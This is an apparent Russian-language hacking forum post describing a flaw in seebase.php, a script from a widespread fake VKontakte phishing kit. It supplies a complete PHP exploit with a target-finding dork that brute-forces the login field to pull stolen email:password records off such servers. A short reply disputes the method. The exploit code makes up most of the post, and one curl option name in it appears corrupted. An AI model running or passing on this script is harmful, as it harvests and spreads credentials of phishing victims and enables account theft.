В сети очень распростанен фейк для зомби - сети вконтакте, состоящий из файлов -log.php -base.php -seebase.php Баг кроется в файле seebase.php, позволяющий читать нам логи if (strpos($buffer,$login) !== false) { echo $buffer.'<BR>'; break; } } fclose($fp); } Все дело в том что нам не обязательно вводить логин, достаточно просто перебирать комбинации символов Code: : @ . _ 0 1 2 3 4 5 6 7 8 9 a b c d e f g h i k l m n o p q r s t v x y z Те есть запись [email protected]:qwerty мы в поле логин вводим m и на выходе получаем [email protected]:qwerty Стоит заметить что мы получим только одну запись(!) которая стоит первее всех в списке Что бы не мучать мозг пишем сплоит PHP: <?php /* Exploit by FriLL [BugTrack Team] - http://bug-track.ru Vkontakte fake exploit Target - seebase.php Dork: inurl:seebase.php */ echo(" <form method=\"post\"> <input type=\"text\" name=\"host\"> <input type=\"submit\"> </form> "); if(isset($_POST['host'])) { $arr = file("comb.txt"); $i=0; while($i<count($arr)) { $postdata="login=".$arr[$i].""; $ch1 = curl_init("".$_POST['host']."/seebase.php"); curl_setopt ($ch1, CURLOPT_ENCODING, 0); curl_setopt ($ch1, CURLOPT_USERAGENT, 'Mozilla/5.0'); curl_setopt ($ch1, CURLOPT_POSTFIELDS, $postdata); curl_setopt ($ch1, CURLOPT_POST, 1); curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch1, CURLOPT_FAILonЕггор, 1); curl_setopt ($ch1, CURLOPT_CONNECTTIMEOUT, 30); $r=curl_exec ($ch1); if (curl_errno($ch1)) return false; else curl_close($ch1); $f = explode("<BR>", $r); if(isset($f[1])) { echo ("".$f[1]."<br>"); } $i++; } } ?> (с) FriLL http://forum.xakep.ru/m_1818405/tm.htm
[email protected]:qwerty [email protected]:qwerty покажет только первую запись или только вторую. Имхо бред